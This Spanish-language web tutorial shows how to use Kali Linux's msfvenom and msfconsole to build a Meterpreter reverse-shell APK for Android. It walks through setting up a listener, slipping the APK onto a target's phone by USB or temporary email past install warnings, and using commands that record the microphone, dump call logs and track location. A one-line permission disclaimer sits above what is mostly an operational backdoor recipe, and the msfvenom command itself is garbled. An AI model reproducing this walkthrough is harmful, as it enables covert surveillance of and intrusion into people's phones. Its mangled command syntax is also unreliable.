Cómo acceder a un teléfono Android usando Kali Linux

Un smartphone Android suele ser la puerta de entrada a la mayoría de los aparatos comerciales del IoT. Una alarma de humo Nest se gestiona a través de una aplicación Android pertinente. Lo mismo ocurre con un termostato Nest para controlar la temperatura. Cerraduras inteligentes, cámaras de timbre: se puede acceder a casi todos los dispositivos inteligentes desde Alexa u otras aplicaciones principales. ¿Qué pasaría si alguien obtuviera acceso remoto a un teléfono Android de este tipo? ¿Cree que esto es imposible? Para ello, haremos una demostración básica de cómo se puede utilizar un «metasploit» de Kali Linux para crear una entrada por la puerta trasera de su teléfono Android.

Nota: este tutorial es para investigadores de seguridad y aficionados. No recomendamos hackear el teléfono de nadie sin su permiso.

Antecedentes

Antes de comenzar a trabajar en Kali Linux, primero debe familiarizarse con su terminal de consola.

Alberga fácilmente una amplia lista de herramientas que están diseñadas para atacar el firmware o el sistema operativo de un dispositivo.

Aquí, utilizaremos una de las herramientas más comunes llamada «MSFVenom» para insertar un virus en un teléfono Android. Genera múltiples tipos de cargas útiles en función de las opciones seleccionadas por el usuario. El exploit funciona en muchas plataformas, incluyendo Windows, Android, OpenBSD, Solaris, JAVA, PHP y hardware para juegos.

Lanzamiento de un Metasploit para Android

Los siguientes pasos demostrarán cómo descargar MSFVenom en un sistema Kali Linux.

Inicie la terminal e introduzca el siguiente comando.

msfvenom – p androidmeterpreterreverse_tcp L HOST=dirección IP LPORT=Número R> rootLOCATIONhackand.apk

Aquí, la carga útil se lanza utilizando una extensión de Exploit llamada «Meterpreter».

Para determinar la dirección IP del host de escucha, abra un nuevo terminal de consola e introduzca ifconfig. Normalmente, el puerto 4444 se asigna para troyanos, exploits y virus.

Una vez determinada la dirección IP, vuelva a la pantalla anterior e introduzca los detalles.

El archivo «hackand.apk» se guardará en el escritorio y es el principal exploit backdoor que se utilizará en el teléfono Android.

En el siguiente paso, lance «msfconsole» que es una herramienta de pruebas de penetración común utilizada con Kali Linux. Para ello, introduzca service postgresql start seguido de msfconsole. PostgreSQL hace referencia a una base de datos donde se ha almacenado la consola.

Una vez que la herramienta de penetración está lista, puede lanzar el resto del exploit.

A continuación, se utilizará un ejecutable llamado «multi-handler».

use multihandler

Consulte la siguiente imagen para conectar el exploit con la consola. Se utilizará la misma dirección IP y los mismos números de puerto.

En la siguiente etapa, el exploit msfvenom será lanzado e inicializado con un simple comando de exploit. Ahora, tenemos que encontrar un objetivo que será un teléfono Android.

Conectando la terminal de Kali Linux con el teléfono Android

El archivo hackand.apk que hemos descargado anteriormente sólo tiene un tamaño de 10 KB. Tendrá que encontrar la manera de insertar el archivo en el teléfono del objetivo. Puede transferirlo mediante un USB o un servicio de correo electrónico temporal.

Por lo general, los proveedores de correo web como Gmail o Yahoo se negarán a transportar este archivo infectado por el virus.

Android le avisará antes de insertar el software. Sin embargo, sólo tarda menos de 20 segundos en completar la instalación, ya que sólo tiene que «ignorar el riesgo e instalar». Esto hace que la amenaza sea algo grave si su teléfono está en modo de desbloqueo.

Como se muestra aquí, se puede hacer mucho daño al teléfono, incluyendo la modificación de los contenidos de almacenamiento, impedir que el teléfono entre en reposo, conectarse y desconectarse del Wi-Fi, establecer el fondo de pantalla, y más.

Una vez instalado el archivo APK, se puede camuflar de forma inteligente dentro del teléfono.

Ahora, puede utilizar muchos comandos como los siguientes en la terminal de Kali Linux para controlar el teléfono. En realidad, no tiene que recordarlos, ya que la lista está disponible desde una simple opción de ayuda en meterpreter.

  • record_mic: grabar el micrófono
  • dump calllog: obtener el registro de llamadas
  • webcam_chat: iniciar un videochat
  • geolocalizar: obtener la ubicación actual del teléfono

La mayoría de los teléfonos Android avanzados impedirán que se instale esta aplicación maliciosa. Por lo tanto, este exploit funcionará generalmente con los modelos de Android más antiguos.

Pensamientos

En este tutorial, hemos visto una estrategia básica de uso de Kali Linux para obtener acceso a un smartphone Android. Aunque se trata de un exploit muy sencillo, tiene grandes implicaciones en términos de seguridad del IoT.

¿Qué opina de los exploits de Kali Linux? ¿Tendrá más cuidado con la seguridad de su teléfono? Háganoslo saber en los comentarios.

¿Es útil este artículo?

No

Deja un comentario

Este sitio web utiliza cookies para mejorar tu experiencia. Si continuas utilizando este sitio consideramos que estás de acuerdo con esto. Más información

Los ajustes de cookies en esta web están configurados para «permitir las cookies» y ofrecerte la mejor experiencia de navegación posible. Si sigues usando esta web sin cambiar tus ajustes de cookies o haces clic en «Aceptar», estarás dando tu consentimiento a esto.

Cerrar